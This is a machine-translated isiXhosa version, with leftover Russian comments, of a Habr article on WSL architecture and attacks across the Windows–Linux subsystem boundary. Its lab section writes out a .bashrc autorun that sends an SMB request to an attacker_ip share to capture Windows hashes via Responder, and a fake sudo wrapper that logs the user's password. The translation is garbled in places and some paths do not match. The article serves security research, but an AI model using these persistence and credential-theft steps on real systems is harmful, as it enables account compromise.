Molo, habr! I-OTUS isungula indlela entsha yekhosi ngo-Okthobha . Ukulindela ukuqala kwekhosi, sikwabelana nawe ngenqaku elibhalwe ngomnye wabafundisi bethu, u-Alexander Kolesnikov.
Ngo-2016, uMicrosoft wazisa itekhnoloji entsha ye-WSL kuluntu lwe-IT (Wiindows Subsystem ye Linux), eyathi kwixesha elizayo yenze ukuba kwenzeke ukumanyanisa abo bakhuphisana nabo ngaphambili bebesilwela ukuduma phakathi kwabasebenzisi be-OS abaqhelekileyo nabaphambili: Windows kunye neLinux. Le teknoloji yenza ukuba kube lula ukusebenzisa izixhobo ze-Linux OS kwindawo yeWindows ngaphandle kwesidingo sokusebenzisa i-Linux, umzekelo, usebenzisa i-Multi-boot. KwiHabr unokufumana inani elikhulu lamanqaku achaza izibonelelo zokusebenzisa iWSL. Nangona kunjalo, ngelishwa, ngexesha lokudalwa kweli nqaku, akukho zifundo malunga nokhuseleko lwe-symbiosis yeenkqubo zokusebenza ezifunyenwe kulo mthombo. Esi sithuba siya kuba ngumzamo wokulungisa oku. Inqaku liza kuthetha malunga neempawu ze-WSL 1 kunye ne-2 yokwakha kwaye ihlolisise imizekelo emininzi yokuhlaselwa kweenkqubo zisebenzisa obu buchwepheshe. Inqaku lahlulwe libe ngamacandelo ama-2. Eyokuqala iya kubonelela ngeendlela eziphambili zokuhlaselwa kwethiyori ukusuka kwiLinux kunye neWindows. Inqaku lesibini liya kubandakanya ukuseka indawo yokuvavanya kunye nokuvelisa ukuhlaselwa.
I-WSL 1: iimpawu zoyilo
Okona kuntywila ngokuchanekileyo kwimiba yokhuseleko ye-WSL, kuyafuneka ukufumanisa ezona mpawu ziphambili ezinxulumene nokuphunyezwa kwenkqubo engaphantsi. Omnye weyona misebenzi iphambili yomsebenzisi esonjululwe yi-WSL kukukwazi ukusebenza nge-terminal ye-Linux kumamkeli osebenzisa iWindows OS. Kwakhona, ukuhambelana okubonelelweyo kwakungokwemvelo kangangokuba ukuphunyezwa kweLinux (ELFs) kunokuqhutywa ngokuthe ngqo kwinkqubo yeWindows. Ukufezekisa ezi njongo, isistim esisezantsi esikhethekileyo senziwe ngaphakathi Windows 10 ekuvumela ukuba usebenzise ii-aplikeshini zeLinux usebenzisa iseti yeefowuni zenkqubo ethile-ngoko ke, kwazanywa ukwenza imephu yeseti yeLinux syscalls kwiWindows. Oku kwaphunyezwa ngokwasemzimbeni ngokongeza abaqhubi abatsha kunye nefomathi yenkqubo entsha. Ngeliso loyilo lwezakhiwo lwalujongeka ngolu hlobo:
Enyanisweni, intsebenziswano kunye nenkqubo yokusebenza ye-Linux yahlelwa ngeemodyuli ezininzi ze-kernel kunye nohlobo olulodwa lwenkqubo-pico. Ukusuka kumzobo ongentla, uyabona ukuba inkqubo eqhuba kumzekelo weLinux kumamkeli kufuneka ibe yeyasentla kwaye kufuneka isebenzise izixhobo ezifanayo njengee-Windows ezisetyenziswa rhoqo. Kodwa njani ukuphumeza oku? Kwiprojekthi Iikhonsepthi zenkqubo yeeWindows zaphuhliswa ezibonelela ngawo onke amacandelo ayimfuneko enkqubo yokusebenza (kuxhomekeke kuguqulelo lwayo) ukuze kuqhutywe usetyenziso lwenye i-OS.
Qaphela ukuba ukukhutshwa okucetywayo kwenze ukuba kube lula ukungagxili kwinkqubo yokusebenza (ngokukodwa, iWindows), apho inkqubo yenye i-OS kulindeleke ukuba iqalise, kwaye iphakamise indlela eqhelekileyo.
Ke, nasiphi na isicelo esingaphakathi kwinkqubo ye-pico inokuqhuba ngaphandle kokujonga i-kernel yeWindows:
- Iingxaki zokuhambelana kunye nokuguqulelwa kweefowuni zenkqubo kufuneka zisonjululwe ngababoneleli abakhethekileyo;
- Ulawulo lofikelelo kufuneka lwenziwe ngeMoni yoKhuseleko. Imonitha ikwi-kernel kwaye ke ngoko iWindows ibifuna uphuculo ngohlobo lomqhubi omtsha onokusebenza njengomboneleli weenkqubo ezinjalo. Inkqubo yeprototype pico iboniswe ngezantsi:
Ekubeni inkqubo yefayile ye-Linux isebenzisa i-case-sensitive file kunye namagama olawulo, iintlobo ezi-2 zeenkqubo zefayile zongezwa kwiWindows ukuze zisebenze kunye neWSL - VolFS kunye neDriveFS. I-VolFS kukuphunyezwa kwenkqubo yefayile ye-Linux, i-DriveFS yinkqubo yefayile esebenza ngokwemigaqo yeWindows, kodwa inamandla okukhetha uvakalelo lwetyala.
I-WSL 2
I-WSL 1 yayinenani lemida engazange ivumele ukuba isetyenziswe ukuxazulula uluhlu oluphezulu lwemisebenzi: umzekelo, yayingenakho ukukwazi ukuqhuba izicelo ze-32-bit Linux, kwaye kwakungenakwenzeka ukusebenzisa abaqhubi besixhobo. Ke ngoko, ngo-2020, iWSL 2 yakhululwa, eyatshintsha indlela yokwakha inkqubo engaphantsi. I-WSL 2 ngumatshini wenyani olungiselelweyo ohambelana neempawu zokusetyenziswa kobutyebi be-WSL 1. Ngoku, kuxhomekeke kwiingxaki ezisonjululwe ngumsebenzisi weWindows OS, unokukhetha uguqulelo olufunekayo lwenkqubo esezantsi yeLinux. Ukunciphisa ubuthathaka obunokwenzeka, i-WSL 2 yaphunyezwa ngokusekelwe kwi-Hyper-V kwi-Windows 10. Kule fomu, iWindows inamandla okuqhuba i-kernel ye-Linux yokusebenza yodwa. Kufanelekile ukukhumbula ukuba uguqulelo loku-1 lwe-WSL lwaziswa njengophawu lwe-beta obekufanele lubonise isalathiso sophuhliso lweWindows kule ndawo, ngoko ke ukutshintshela kwi-Hyper-V kwakungenakuthintelwa. Uyilo lokugqibela lujongeka ngolu hlobo:
Kule nguqulo, i-Windows kunye ne-Linux kernels zinezixhobo zazo kwaye i-intersection ikhona kuphela kwinkqubo yefayile, kodwa le ngqungquthela ayiphelelanga. Ukusebenzisana phakathi kweenkqubo zefayile kuqhutywa nge-protocol ye-client-server esebenza ngokusebenzisa iprotocol ye-9P.
Namhlanje iMicrosoft ibonelela ngokukwazi ukutshintsha phakathi kweWSL 1 kunye neWSL 2. Zombini iinguqulelo ziyafumaneka ukuze zisetyenziswe.
Ukhuseleko lweWSL
Okwangoku, kukho imisebenzi emininzi echaza ezinye iindlela zokusebenzisa izixhobo ezisemthethweni ze-OS ukuhlasela unxibelelwano phakathi kwenkqubo engaphantsi. Siza kusebenzisa izikripthi zabo ukujonga ukufaneleka kohlaselo ngexesha lokubhala. Uluhlu olubanzi lohlaselo kunye neemeko:
1. Ukuphunyezwa kwenkqubo yefayile: amalungelo okufikelela, ukufumaneka kwezalathisi ekwabelwana ngazo/iindlela zokutshintshiselana ngedatha.
Uphando lwenziwe ukumisela ukunyhashwa kwemithetho yokufikelela ukusuka Linux FS->Windows FS, Windows FS->Linux FS. Uphando lubonise amandla okuguqula ifayile enikiweyo ngaphakathi kwe-OS ekujoliswe kuyo. Iinzame zenziwa kwakhona ukufaka endaweni, ukwenza iimpinda kunye nokucima inxalenye yeenkqubo zeefayile.
Imeko:
- A. Uhlaselo olusuka kwisixokelelwano seWindows - ukulungiswa kweefayile ukusuka kwi/etc directory ye Linux OS.
- B. Uhlaselo olusuka kwisixokelelwano seLinux - ukuguqulwa kweefayile kubalawuli:
C:Windows,C:Program Files,C:Users<User>
2. Ukuphunyezwa kwesitaki sothungelwano.
Uphando lwenziwa kusetyenziswa imizekelo yohlaselo olusuka kwinkqubo yokusebenza yeLinux kwiWindows. Iimpawu zesitaki sothungelwano zisetyenzisiwe, ezizezi, iindlela zokuqinisekisa kwizibonelelo ezahlukeneyo.
Imeko:
- Ukuvula ufikelelo kwizibuko elihlala kwinkqubo yeWindows
- Ukuvula izibuko ngaphandle kwamalungelo afanelekileyo
- Ukubaleka umva iqokobhe usebenzisa ifayile ye-elf kwinkqubo yokusebenza yeWindows.
3. Ukufihla ukuqaliswa kweenkqubo zesoftware enobungozi usebenzisa isistim esezantsi ye-WSL.
Uphando lwalusekwe kwinyaniso elula-inkqubo esezantsi yokhuseleko ayinakunqanda iziganeko kwenye ikernel esebenza usebenzisa umnikezeli osemthethweni osuka kwinkqubo yokusebenza kwimeko ye-WSL 1. Kwimeko ye-WSL 2, akukho ndlela yokujonga iziganeko ezenzekayo. kwi-kernel eyahlukileyo ngaphakathi komatshini wenyani okhaphukhaphu.
Imeko:
1) Qalisa isicelo sofikelelo olukude kwisistim kwaye ujonge imicimbi engenisiweyo.
WSL 1 imifuniselo: hash interception (Windows)
Ekugqibeleni safika kwindawo ebonakalayo. Okokuqala, kufuneka usete indawo yovavanyo. Yonke imifuniselo iya kuqhutywa kwibhentshi nge Windows 10 kufakwe i-2004. Umfanekiso we-Ubuntu 18.04 ukhethwe njengomfanekiso wenkqubo yokusebenza ye-WSL. Umfanekiso ukhethwe ngokungaqhelekanga, kwaye nayiphi na enye iya kusebenza ngokufanayo. Imiyalelo yokumisela isitendi:
Kufuneka uqale uqalise powershell.exe njengomlawuli.
Kwi-WSL 1 kufuneka usebenzise imiyalelo:
- Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
- Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804
-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft
Ubuntu.appx install —root #Установим образ
Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.
Restart-Computer #Перезагрузим
Emva kokuqalisa kwakhona i-stand, ungabiza umyalelo we-bash. Ukuba yonke into isebenze ngokuchanekileyo, uya kubona imveliso efana nale kwiWindows console:
Siza kusebenzisa ukuhanjiswa kweKali Linux njengomatshini womhlaseli; bonke oomatshini kufuneka babe kuthungelwano lwendawo enye.
Makhe sicinge ukuba sinofikelelo olungeyomfuneko kwi-WSL kumatshini weWindows. Makhe sizame ukuhlasela inkqubo yeLinux ngokubiza umyalelo ovela kwiLinux. Ukuphumeza uhlaselo, siya kusebenzisa ubuchule obulula be-autorun - siya kongeza iskripthi sethu sokwenziwa kwimeko yeLinux. Ukwenza oku kufuneka utshintshe ifayile .bashrc.
Kumatshini one-WSL senza:
1. bash
2. Переходим в домашнюю директорию пользователя: cd /home/sam/
2. echo «/home/sam/.attack.sh» >> .bashrc
3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
4. chmod u+x .attack.sh
5. exitKumatshini weKali Linux siqhuba:
1. Responder -I eth0 -rdvwKumatshini weWindows, masiqalise i-bash.
Silindele umphumo kumatshini weKali Linux:
Ke, sifumene i-Windows hashes yomsebenzisi nge-subsystem ye-WSL ngokwenza umyalelo kwinkqubo yeLinux.
WSL 1 imifuniselo: ukufumana igama lokugqitha lomsebenzisi (Linux OS)
Masenze umfuniselo omnye. Ngeli xesha lokutshekisha siyakongeza kwifayile .bashrc imiyalelo emininzi ukuze ufumane igama lokugqitha lomsebenzisi le Linux.
Masiqalise i-bash kwaye singenise imiyalelo:
1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit
Ukugqiba ngempumelelo uhlaselo, umsebenzisi uSam kufuneka afowunele i-sudo kwi-terminal yeLinux. Emva koku, igama lokugqitha lomsebenzisi leLinux OS liya kuba kwifayile pass.txt:
Ukuphunyezwa kohlaselo kwanikezelwa ngolwazi lwethiyori kuphela.
Inxalenye elandelayo yenqaku iya kuchaza ukuphunyezwa kweprotocol ye-9P, qwalasela ukudala iskena sale protocol, kwaye wenze uhlaselo usebenzisa.
Uluhlu loncwadi olusetyenzisiweyo
Funda ngokugqithisileyo
umthombo: www.habr.com